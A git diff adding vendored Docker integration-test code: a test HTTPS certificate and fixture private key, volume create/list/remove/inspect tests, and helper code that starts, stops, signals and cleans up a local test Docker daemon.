++EIBAQQEAwIGQDA0BglghkgBhvhCAQ0EJxYlRWFzeS1SU0EgR2VuZXJhdGVkIFNl +cnZlciBDZXJ0aWZpY2F0ZTAdBgNVHQ4EFgQUFAL9/d0TOOBx6tG+wA6JGi22GQYw +gdcGA1UdIwSBzzCBzIAUZu7DFz09q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJ +BgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUw +EwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQD +EwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1h +aWxAaG9zdC5kb21haW6CCQD9q+xqhCcEpzATBgNVHSUEDDAKBggrBgEFBQcDATAL +BgNVHQ8EBAMCBaAwDQYJKoZIhvcNAQEFBQADgYEAQA8QOcS3Dw0vv9IWzI7TmvuL +zkt7DUh3zvH+1Y/qsXHtSR2fIzoW1HB8xSm/5JA00PAAJPTk3yzDgwFmYcmoqynn +mG0niUp2yS4Zjv5u1fiZEQ6XZ0s04x7jnzUApTL5tSzy4MUuzIG9GN1cEshr+gwX +dDBV9m4gmmweCbQMFUI= 
+-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration/testdata/https/server-key.pem b/vendor/github.com/docker/docker/integration/testdata/https/server-key.pem new file mode 100644 index 0000000000..c269320ef0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/testdata/https/server-key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAMH/fTBvZEqxkrFx +0cF04h3bLREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y +4OjCv5p3cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+ +lA2LQ2chM7IIYJ12qAUyHvmVCRR1AgMBAAECgYAmwckb9RUfSwyYgLm8IYLPHiuJ +wkllZfVg5Bo7gXJcQnFjZmJ56uTj8xvUjZlODIHM63TSO5ibv6kFXtXKCqZGd2M+ +wGbhZ0f+2GvKcwMmJERnIQjuoNaYSQLT0tM0VB9Iz0rJlZC+tzPZ+5pPqEumRdsS +IzWNXfF42AhcbwAQYQJBAPVXtMYIJc9EZsz86ZcQiMPWUpCX5vnRmtwL8kKyR8D5 +4KfYeiowyFffSRMMcclwNHq7TgSXN+nIXM9WyzyzwikCQQDKbNA28AgZp9aT54HP +WnbeE2pmt+uk/zl/BtxJSoK6H+69Jec+lf7EgL7HgOWYRSNot4uQWu8IhsHLTiUq ++0FtAkEAqwlRxRy4/x24bP+D+QRV0/D97j93joFJbE4Hved7jlSlAV4xDGilwlyv +HNB4Iu5OJ6Gcaibhm+FKkmD3noHSwQJBAIpu3fokLzX0bS+bDFBU6qO3HXX/47xj ++tsfQvkwZrSI8AkU6c8IX0HdVhsz0FBRQAT2ORDQz1XCarfxykNZrwUCQQCGCBIc +BBCWzhHlswlGidWJg3HqqO6hPPClEr3B5G87oCsdeYwiO23XT6rUnoJXfJHp6oCW +5nCwDu5ZTP+khltg +-----END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration/volume/main_test.go b/vendor/github.com/docker/docker/integration/volume/main_test.go new file mode 100644 index 0000000000..206f7377ae --- /dev/null +++ b/vendor/github.com/docker/docker/integration/volume/main_test.go @@ -0,0 +1,33 @@ +package volume // import "github.com/docker/docker/integration/volume" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + 
fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/volume/volume_test.go b/vendor/github.com/docker/docker/integration/volume/volume_test.go new file mode 100644 index 0000000000..ce42bb3040 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/volume/volume_test.go @@ -0,0 +1,116 @@ +package volume + +import ( + "context" + "fmt" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + volumetypes "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "github.com/google/go-cmp/cmp/cmpopts" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestVolumesCreateAndList(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + name := t.Name() + vol, err := client.VolumeCreate(ctx, volumetypes.VolumeCreateBody{ + Name: name, + }) + assert.NilError(t, err) + + expected := types.Volume{ + // Ignore timestamp of CreatedAt + CreatedAt: vol.CreatedAt, + Driver: "local", + Scope: "local", + Name: name, + Mountpoint: fmt.Sprintf("%s/volumes/%s/_data", testEnv.DaemonInfo.DockerRootDir, name), + } + assert.Check(t, is.DeepEqual(vol, expected, cmpopts.EquateEmpty())) + + volumes, err := client.VolumeList(ctx, filters.Args{}) + assert.NilError(t, err) + + assert.Check(t, is.Equal(len(volumes.Volumes), 1)) + assert.Check(t, volumes.Volumes[0] != nil) + assert.Check(t, is.DeepEqual(*volumes.Volumes[0], expected, cmpopts.EquateEmpty())) +} + +func TestVolumesRemove(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := 
context.Background() + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + id := container.Create(t, ctx, client, container.WithVolume(prefix+slash+"foo")) + + c, err := client.ContainerInspect(ctx, id) + assert.NilError(t, err) + vname := c.Mounts[0].Name + + err = client.VolumeRemove(ctx, vname, false) + assert.Check(t, is.ErrorContains(err, "volume is in use")) + + err = client.ContainerRemove(ctx, id, types.ContainerRemoveOptions{ + Force: true, + }) + assert.NilError(t, err) + + err = client.VolumeRemove(ctx, vname, false) + assert.NilError(t, err) +} + +func TestVolumesInspect(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + // sampling current time minus a minute so to now have false positive in case of delays + now := time.Now().Truncate(time.Minute) + + name := t.Name() + _, err := client.VolumeCreate(ctx, volumetypes.VolumeCreateBody{ + Name: name, + }) + assert.NilError(t, err) + + vol, err := client.VolumeInspect(ctx, name) + assert.NilError(t, err) + + expected := types.Volume{ + // Ignore timestamp of CreatedAt + CreatedAt: vol.CreatedAt, + Driver: "local", + Scope: "local", + Name: name, + Mountpoint: fmt.Sprintf("%s/volumes/%s/_data", testEnv.DaemonInfo.DockerRootDir, name), + } + assert.Check(t, is.DeepEqual(vol, expected, cmpopts.EquateEmpty())) + + // comparing CreatedAt field time for the new volume to now. 
Removing a minute from both to avoid false positive + testCreatedAt, err := time.Parse(time.RFC3339, strings.TrimSpace(vol.CreatedAt)) + assert.NilError(t, err) + testCreatedAt = testCreatedAt.Truncate(time.Minute) + assert.Check(t, is.Equal(testCreatedAt.Equal(now), true), "Time Volume is CreatedAt not equal to current time") +} + +func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) { + if testEnv.OSType == "windows" { + return "c:", `\` + } + return "", "/" +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/config.go b/vendor/github.com/docker/docker/internal/test/daemon/config.go new file mode 100644 index 0000000000..ce99222b37 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/config.go @@ -0,0 +1,82 @@ +package daemon + +import ( + "context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +// ConfigConstructor defines a swarm config constructor +type ConfigConstructor func(*swarm.Config) + +// CreateConfig creates a config given the specified spec +func (d *Daemon) CreateConfig(t assert.TestingT, configSpec swarm.ConfigSpec) string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + scr, err := cli.ConfigCreate(context.Background(), configSpec) + assert.NilError(t, err) + return scr.ID +} + +// ListConfigs returns the list of the current swarm configs +func (d *Daemon) ListConfigs(t assert.TestingT) []swarm.Config { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + configs, err := cli.ConfigList(context.Background(), types.ConfigListOptions{}) + assert.NilError(t, err) + return configs +} + +// GetConfig returns a swarm config identified by the specified id +func (d *Daemon) GetConfig(t assert.TestingT, id string) *swarm.Config { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli 
:= d.NewClientT(t) + defer cli.Close() + + config, _, err := cli.ConfigInspectWithRaw(context.Background(), id) + assert.NilError(t, err) + return &config +} + +// DeleteConfig removes the swarm config identified by the specified id +func (d *Daemon) DeleteConfig(t assert.TestingT, id string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + err := cli.ConfigRemove(context.Background(), id) + assert.NilError(t, err) +} + +// UpdateConfig updates the swarm config identified by the specified id +// Currently, only label update is supported. +func (d *Daemon) UpdateConfig(t assert.TestingT, id string, f ...ConfigConstructor) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + config := d.GetConfig(t, id) + for _, fn := range f { + fn(config) + } + + err := cli.ConfigUpdate(context.Background(), config.ID, config.Version, config.Spec) + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/container.go b/vendor/github.com/docker/docker/internal/test/daemon/container.go new file mode 100644 index 0000000000..3aa69e195c --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/container.go @@ -0,0 +1,40 @@ +package daemon + +import ( + "context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +// ActiveContainers returns the list of ids of the currently running containers +func (d *Daemon) ActiveContainers(t assert.TestingT) []string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + containers, err := cli.ContainerList(context.Background(), types.ContainerListOptions{}) + assert.NilError(t, err) + + ids := make([]string, len(containers)) + for i, c := range containers { + ids[i] = c.ID + } + return ids +} + +// FindContainerIP returns the ip of the specified container +func (d *Daemon) 
FindContainerIP(t assert.TestingT, id string) string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + i, err := cli.ContainerInspect(context.Background(), id) + assert.NilError(t, err) + return i.NetworkSettings.IPAddress +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/daemon.go b/vendor/github.com/docker/docker/internal/test/daemon/daemon.go new file mode 100644 index 0000000000..98f1ee1b08 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/daemon.go @@ -0,0 +1,681 @@ +package daemon // import "github.com/docker/docker/internal/test/daemon" + +import ( + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "os" + "os/exec" + "path/filepath" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/client" + "github.com/docker/docker/internal/test" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" + "github.com/pkg/errors" + "gotest.tools/assert" +) + +type testingT interface { + assert.TestingT + logT + Fatalf(string, ...interface{}) +} + +type logT interface { + Logf(string, ...interface{}) +} + +const defaultDockerdBinary = "dockerd" + +var errDaemonNotStarted = errors.New("daemon not started") + +// SockRoot holds the path of the default docker integration daemon socket +var SockRoot = filepath.Join(os.TempDir(), "docker-integration") + +type clientConfig struct { + transport *http.Transport + scheme string + addr string +} + +// Daemon represents a Docker daemon for the testing framework +type Daemon struct { + GlobalFlags []string + Root string + Folder string + Wait chan error + UseDefaultHost bool + UseDefaultTLSHost bool + + id string + logFile 
*os.File + cmd *exec.Cmd + storageDriver string + userlandProxy bool + execRoot string + experimental bool + init bool + dockerdBinary string + log logT + + // swarm related field + swarmListenAddr string + SwarmPort int // FIXME(vdemeester) should probably not be exported + + // cached information + CachedInfo types.Info +} + +// New returns a Daemon instance to be used for testing. +// This will create a directory such as d123456789 in the folder specified by $DOCKER_INTEGRATION_DAEMON_DEST or $DEST. +// The daemon will not automatically start. +func New(t testingT, ops ...func(*Daemon)) *Daemon { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + dest := os.Getenv("DOCKER_INTEGRATION_DAEMON_DEST") + if dest == "" { + dest = os.Getenv("DEST") + } + assert.Check(t, dest != "", "Please set the DOCKER_INTEGRATION_DAEMON_DEST or the DEST environment variable") + + storageDriver := os.Getenv("DOCKER_GRAPHDRIVER") + + assert.NilError(t, os.MkdirAll(SockRoot, 0700), "could not create daemon socket root") + + id := fmt.Sprintf("d%s", stringid.TruncateID(stringid.GenerateRandomID())) + dir := filepath.Join(dest, id) + daemonFolder, err := filepath.Abs(dir) + assert.NilError(t, err, "Could not make %q an absolute path", dir) + daemonRoot := filepath.Join(daemonFolder, "root") + + assert.NilError(t, os.MkdirAll(daemonRoot, 0755), "Could not create daemon root %q", dir) + + userlandProxy := true + if env := os.Getenv("DOCKER_USERLANDPROXY"); env != "" { + if val, err := strconv.ParseBool(env); err != nil { + userlandProxy = val + } + } + d := &Daemon{ + id: id, + Folder: daemonFolder, + Root: daemonRoot, + storageDriver: storageDriver, + userlandProxy: userlandProxy, + execRoot: filepath.Join(os.TempDir(), "docker-execroot", id), + dockerdBinary: defaultDockerdBinary, + swarmListenAddr: defaultSwarmListenAddr, + SwarmPort: DefaultSwarmPort, + log: t, + } + + for _, op := range ops { + op(d) + } + + return d +} + +// RootDir returns the root directory of the daemon. 
+func (d *Daemon) RootDir() string { + return d.Root +} + +// ID returns the generated id of the daemon +func (d *Daemon) ID() string { + return d.id +} + +// StorageDriver returns the configured storage driver of the daemon +func (d *Daemon) StorageDriver() string { + return d.storageDriver +} + +// Sock returns the socket path of the daemon +func (d *Daemon) Sock() string { + return fmt.Sprintf("unix://" + d.sockPath()) +} + +func (d *Daemon) sockPath() string { + return filepath.Join(SockRoot, d.id+".sock") +} + +// LogFileName returns the path the daemon's log file +func (d *Daemon) LogFileName() string { + return d.logFile.Name() +} + +// ReadLogFile returns the content of the daemon log file +func (d *Daemon) ReadLogFile() ([]byte, error) { + return ioutil.ReadFile(d.logFile.Name()) +} + +// NewClient creates new client based on daemon's socket path +// FIXME(vdemeester): replace NewClient with NewClientT +func (d *Daemon) NewClient() (*client.Client, error) { + return client.NewClientWithOpts( + client.FromEnv, + client.WithHost(d.Sock())) +} + +// NewClientT creates new client based on daemon's socket path +// FIXME(vdemeester): replace NewClient with NewClientT +func (d *Daemon) NewClientT(t assert.TestingT) *client.Client { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + c, err := client.NewClientWithOpts( + client.FromEnv, + client.WithHost(d.Sock())) + assert.NilError(t, err, "cannot create daemon client") + return c +} + +// Cleanup cleans the daemon files : exec root (network namespaces, ...), swarmkit files +func (d *Daemon) Cleanup(t testingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + // Cleanup swarmkit wal files if present + cleanupRaftDir(t, d.Root) + cleanupNetworkNamespace(t, d.execRoot) +} + +// Start starts the daemon and return once it is ready to receive requests. 
+func (d *Daemon) Start(t testingT, args ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + if err := d.StartWithError(args...); err != nil { + t.Fatalf("Error starting daemon with arguments: %v", args) + } +} + +// StartWithError starts the daemon and return once it is ready to receive requests. +// It returns an error in case it couldn't start. +func (d *Daemon) StartWithError(args ...string) error { + logFile, err := os.OpenFile(filepath.Join(d.Folder, "docker.log"), os.O_RDWR|os.O_CREATE|os.O_APPEND, 0600) + if err != nil { + return errors.Wrapf(err, "[%s] Could not create %s/docker.log", d.id, d.Folder) + } + + return d.StartWithLogFile(logFile, args...) +} + +// StartWithLogFile will start the daemon and attach its streams to a given file. +func (d *Daemon) StartWithLogFile(out *os.File, providedArgs ...string) error { + d.handleUserns() + dockerdBinary, err := exec.LookPath(d.dockerdBinary) + if err != nil { + return errors.Wrapf(err, "[%s] could not find docker binary in $PATH", d.id) + } + args := append(d.GlobalFlags, + "--containerd", "/var/run/docker/containerd/docker-containerd.sock", + "--data-root", d.Root, + "--exec-root", d.execRoot, + "--pidfile", fmt.Sprintf("%s/docker.pid", d.Folder), + fmt.Sprintf("--userland-proxy=%t", d.userlandProxy), + ) + if d.experimental { + args = append(args, "--experimental") + } + if d.init { + args = append(args, "--init") + } + if !(d.UseDefaultHost || d.UseDefaultTLSHost) { + args = append(args, []string{"--host", d.Sock()}...) + } + if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { + args = append(args, []string{"--userns-remap", root}...) 
+ } + + // If we don't explicitly set the log-level or debug flag(-D) then + // turn on debug mode + foundLog := false + foundSd := false + for _, a := range providedArgs { + if strings.Contains(a, "--log-level") || strings.Contains(a, "-D") || strings.Contains(a, "--debug") { + foundLog = true + } + if strings.Contains(a, "--storage-driver") { + foundSd = true + } + } + if !foundLog { + args = append(args, "--debug") + } + if d.storageDriver != "" && !foundSd { + args = append(args, "--storage-driver", d.storageDriver) + } + + args = append(args, providedArgs...) + d.cmd = exec.Command(dockerdBinary, args...) + d.cmd.Env = append(os.Environ(), "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE=1") + d.cmd.Stdout = out + d.cmd.Stderr = out + d.logFile = out + + if err := d.cmd.Start(); err != nil { + return errors.Errorf("[%s] could not start daemon container: %v", d.id, err) + } + + wait := make(chan error) + + go func() { + wait <- d.cmd.Wait() + d.log.Logf("[%s] exiting daemon", d.id) + close(wait) + }() + + d.Wait = wait + + tick := time.Tick(500 * time.Millisecond) + // make sure daemon is ready to receive requests + startTime := time.Now().Unix() + for { + d.log.Logf("[%s] waiting for daemon to start", d.id) + if time.Now().Unix()-startTime > 5 { + // After 5 seconds, give up + return errors.Errorf("[%s] Daemon exited and never started", d.id) + } + select { + case <-time.After(2 * time.Second): + return errors.Errorf("[%s] timeout: daemon does not respond", d.id) + case <-tick: + clientConfig, err := d.getClientConfig() + if err != nil { + return err + } + + client := &http.Client{ + Transport: clientConfig.transport, + } + + req, err := http.NewRequest("GET", "/_ping", nil) + if err != nil { + return errors.Wrapf(err, "[%s] could not create new request", d.id) + } + req.URL.Host = clientConfig.addr + req.URL.Scheme = clientConfig.scheme + resp, err := client.Do(req) + if err != nil { + continue + } + resp.Body.Close() + if resp.StatusCode != http.StatusOK { + 
d.log.Logf("[%s] received status != 200 OK: %s\n", d.id, resp.Status) + } + d.log.Logf("[%s] daemon started\n", d.id) + d.Root, err = d.queryRootDir() + if err != nil { + return errors.Errorf("[%s] error querying daemon for root directory: %v", d.id, err) + } + return nil + case <-d.Wait: + return errors.Errorf("[%s] Daemon exited during startup", d.id) + } + } +} + +// StartWithBusybox will first start the daemon with Daemon.Start() +// then save the busybox image from the main daemon and load it into this Daemon instance. +func (d *Daemon) StartWithBusybox(t testingT, arg ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + d.Start(t, arg...) + d.LoadBusybox(t) +} + +// Kill will send a SIGKILL to the daemon +func (d *Daemon) Kill() error { + if d.cmd == nil || d.Wait == nil { + return errDaemonNotStarted + } + + defer func() { + d.logFile.Close() + d.cmd = nil + }() + + if err := d.cmd.Process.Kill(); err != nil { + return err + } + + return os.Remove(fmt.Sprintf("%s/docker.pid", d.Folder)) +} + +// Pid returns the pid of the daemon +func (d *Daemon) Pid() int { + return d.cmd.Process.Pid +} + +// Interrupt stops the daemon by sending it an Interrupt signal +func (d *Daemon) Interrupt() error { + return d.Signal(os.Interrupt) +} + +// Signal sends the specified signal to the daemon if running +func (d *Daemon) Signal(signal os.Signal) error { + if d.cmd == nil || d.Wait == nil { + return errDaemonNotStarted + } + return d.cmd.Process.Signal(signal) +} + +// DumpStackAndQuit sends SIGQUIT to the daemon, which triggers it to dump its +// stack to its log file and exit +// This is used primarily for gathering debug information on test timeout +func (d *Daemon) DumpStackAndQuit() { + if d.cmd == nil || d.cmd.Process == nil { + return + } + SignalDaemonDump(d.cmd.Process.Pid) +} + +// Stop will send a SIGINT every second and wait for the daemon to stop. +// If it times out, a SIGKILL is sent. +// Stop will not delete the daemon directory. 
If a purged daemon is needed, +// instantiate a new one with NewDaemon. +// If an error occurs while starting the daemon, the test will fail. +func (d *Daemon) Stop(t testingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + err := d.StopWithError() + if err != nil { + if err != errDaemonNotStarted { + t.Fatalf("Error while stopping the daemon %s : %v", d.id, err) + } else { + t.Logf("Daemon %s is not started", d.id) + } + } +} + +// StopWithError will send a SIGINT every second and wait for the daemon to stop. +// If it timeouts, a SIGKILL is sent. +// Stop will not delete the daemon directory. If a purged daemon is needed, +// instantiate a new one with NewDaemon. +func (d *Daemon) StopWithError() error { + if d.cmd == nil || d.Wait == nil { + return errDaemonNotStarted + } + + defer func() { + d.logFile.Close() + d.cmd = nil + }() + + i := 1 + tick := time.Tick(time.Second) + + if err := d.cmd.Process.Signal(os.Interrupt); err != nil { + if strings.Contains(err.Error(), "os: process already finished") { + return errDaemonNotStarted + } + return errors.Errorf("could not send signal: %v", err) + } +out1: + for { + select { + case err := <-d.Wait: + return err + case <-time.After(20 * time.Second): + // time for stopping jobs and run onShutdown hooks + d.log.Logf("[%s] daemon started", d.id) + break out1 + } + } + +out2: + for { + select { + case err := <-d.Wait: + return err + case <-tick: + i++ + if i > 5 { + d.log.Logf("tried to interrupt daemon for %d times, now try to kill it", i) + break out2 + } + d.log.Logf("Attempt #%d: daemon is still running with pid %d", i, d.cmd.Process.Pid) + if err := d.cmd.Process.Signal(os.Interrupt); err != nil { + return errors.Errorf("could not send signal: %v", err) + } + } + } + + if err := d.cmd.Process.Kill(); err != nil { + d.log.Logf("Could not kill daemon: %v", err) + return err + } + + d.cmd.Wait() + + return os.Remove(fmt.Sprintf("%s/docker.pid", d.Folder)) +} + +// Restart will restart the daemon by first 
stopping it and the starting it. +// If an error occurs while starting the daemon, the test will fail. +func (d *Daemon) Restart(t testingT, args ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + d.Stop(t) + d.Start(t, args...) +} + +// RestartWithError will restart the daemon by first stopping it and then starting it. +func (d *Daemon) RestartWithError(arg ...string) error { + if err := d.StopWithError(); err != nil { + return err + } + return d.StartWithError(arg...) +} + +func (d *Daemon) handleUserns() { + // in the case of tests running a user namespace-enabled daemon, we have resolved + // d.Root to be the actual final path of the graph dir after the "uid.gid" of + // remapped root is added--we need to subtract it from the path before calling + // start or else we will continue making subdirectories rather than truly restarting + // with the same location/root: + if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { + d.Root = filepath.Dir(d.Root) + } +} + +// ReloadConfig asks the daemon to reload its configuration +func (d *Daemon) ReloadConfig() error { + if d.cmd == nil || d.cmd.Process == nil { + return errors.New("daemon is not running") + } + + errCh := make(chan error) + started := make(chan struct{}) + go func() { + _, body, err := request.Get("/events", request.Host(d.Sock())) + close(started) + if err != nil { + errCh <- err + } + defer body.Close() + dec := json.NewDecoder(body) + for { + var e events.Message + if err := dec.Decode(&e); err != nil { + errCh <- err + return + } + if e.Type != events.DaemonEventType { + continue + } + if e.Action != "reload" { + continue + } + close(errCh) // notify that we are done + return + } + }() + + <-started + if err := signalDaemonReload(d.cmd.Process.Pid); err != nil { + return errors.Errorf("error signaling daemon reload: %v", err) + } + select { + case err := <-errCh: + if err != nil { + return errors.Errorf("error waiting for daemon reload event: %v", err) + } + case 
<-time.After(30 * time.Second): + return errors.New("timeout waiting for daemon reload event") + } + return nil +} + +// LoadBusybox image into the daemon +func (d *Daemon) LoadBusybox(t assert.TestingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + clientHost, err := client.NewEnvClient() + assert.NilError(t, err, "failed to create client") + defer clientHost.Close() + + ctx := context.Background() + reader, err := clientHost.ImageSave(ctx, []string{"busybox:latest"}) + assert.NilError(t, err, "failed to download busybox") + defer reader.Close() + + client, err := d.NewClient() + assert.NilError(t, err, "failed to create client") + defer client.Close() + + resp, err := client.ImageLoad(ctx, reader, true) + assert.NilError(t, err, "failed to load busybox") + defer resp.Body.Close() +} + +func (d *Daemon) getClientConfig() (*clientConfig, error) { + var ( + transport *http.Transport + scheme string + addr string + proto string + ) + if d.UseDefaultTLSHost { + option := &tlsconfig.Options{ + CAFile: "fixtures/https/ca.pem", + CertFile: "fixtures/https/client-cert.pem", + KeyFile: "fixtures/https/client-key.pem", + } + tlsConfig, err := tlsconfig.Client(*option) + if err != nil { + return nil, err + } + transport = &http.Transport{ + TLSClientConfig: tlsConfig, + } + addr = fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort) + scheme = "https" + proto = "tcp" + } else if d.UseDefaultHost { + addr = opts.DefaultUnixSocket + proto = "unix" + scheme = "http" + transport = &http.Transport{} + } else { + addr = d.sockPath() + proto = "unix" + scheme = "http" + transport = &http.Transport{} + } + + if err := sockets.ConfigureTransport(transport, proto, addr); err != nil { + return nil, err + } + transport.DisableKeepAlives = true + + return &clientConfig{ + transport: transport, + scheme: scheme, + addr: addr, + }, nil +} + +func (d *Daemon) queryRootDir() (string, error) { + // update daemon root by asking /info endpoint (to support user + // 
namespaced daemon with root remapped uid.gid directory) + clientConfig, err := d.getClientConfig() + if err != nil { + return "", err + } + + client := &http.Client{ + Transport: clientConfig.transport, + } + + req, err := http.NewRequest("GET", "/info", nil) + if err != nil { + return "", err + } + req.Header.Set("Content-Type", "application/json") + req.URL.Host = clientConfig.addr + req.URL.Scheme = clientConfig.scheme + + resp, err := client.Do(req) + if err != nil { + return "", err + } + body := ioutils.NewReadCloserWrapper(resp.Body, func() error { + return resp.Body.Close() + }) + + type Info struct { + DockerRootDir string + } + var b []byte + var i Info + b, err = request.ReadBody(body) + if err == nil && resp.StatusCode == http.StatusOK { + // read the docker root dir + if err = json.Unmarshal(b, &i); err == nil { + return i.DockerRootDir, nil + } + } + return "", err +} + +// Info returns the info struct for this daemon +func (d *Daemon) Info(t assert.TestingT) types.Info { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + apiclient, err := d.NewClient() + assert.NilError(t, err) + info, err := apiclient.Info(context.Background()) + assert.NilError(t, err) + return info +} + +func cleanupRaftDir(t testingT, rootPath string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + walDir := filepath.Join(rootPath, "swarm/raft/wal") + if err := os.RemoveAll(walDir); err != nil { + t.Logf("error removing %v: %v", walDir, err) + } +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/daemon_unix.go b/vendor/github.com/docker/docker/internal/test/daemon/daemon_unix.go new file mode 100644 index 0000000000..9dd9e36f0c --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/daemon_unix.go @@ -0,0 +1,39 @@ +// +build !windows + +package daemon // import "github.com/docker/docker/internal/test/daemon" + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/internal/test" + "golang.org/x/sys/unix" +) + +func 
cleanupNetworkNamespace(t testingT, execRoot string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + // Cleanup network namespaces in the exec root of this + // daemon because this exec root is specific to this + // daemon instance and has no chance of getting + // cleaned up when a new daemon is instantiated with a + // new exec root. + netnsPath := filepath.Join(execRoot, "netns") + filepath.Walk(netnsPath, func(path string, info os.FileInfo, err error) error { + if err := unix.Unmount(path, unix.MNT_FORCE); err != nil { + t.Logf("unmount of %s failed: %v", path, err) + } + os.Remove(path) + return nil + }) +} + +// SignalDaemonDump sends a signal to the daemon to write a dump file +func SignalDaemonDump(pid int) { + unix.Kill(pid, unix.SIGQUIT) +} + +func signalDaemonReload(pid int) error { + return unix.Kill(pid, unix.SIGHUP) +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/daemon_windows.go b/vendor/github.com/docker/docker/internal/test/daemon/daemon_windows.go new file mode 100644 index 0000000000..cb6bb6a4cb --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/daemon_windows.go @@ -0,0 +1,25 @@ +package daemon // import "github.com/docker/docker/internal/test/daemon" + +import ( + "fmt" + "strconv" + + "golang.org/x/sys/windows" +) + +// SignalDaemonDump sends a signal to the daemon to write a dump file +func SignalDaemonDump(pid int) { + ev, _ := windows.UTF16PtrFromString("Global\\docker-daemon-" + strconv.Itoa(pid)) + h2, err := windows.OpenEvent(0x0002, false, ev) + if h2 == 0 || err != nil { + return + } + windows.PulseEvent(h2) +} + +func signalDaemonReload(pid int) error { + return fmt.Errorf("daemon reload not supported") +} + +func cleanupNetworkNamespace(t testingT, execRoot string) { +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/node.go b/vendor/github.com/docker/docker/internal/test/daemon/node.go new file mode 100644 index 0000000000..d9263a7f29 --- /dev/null +++ 
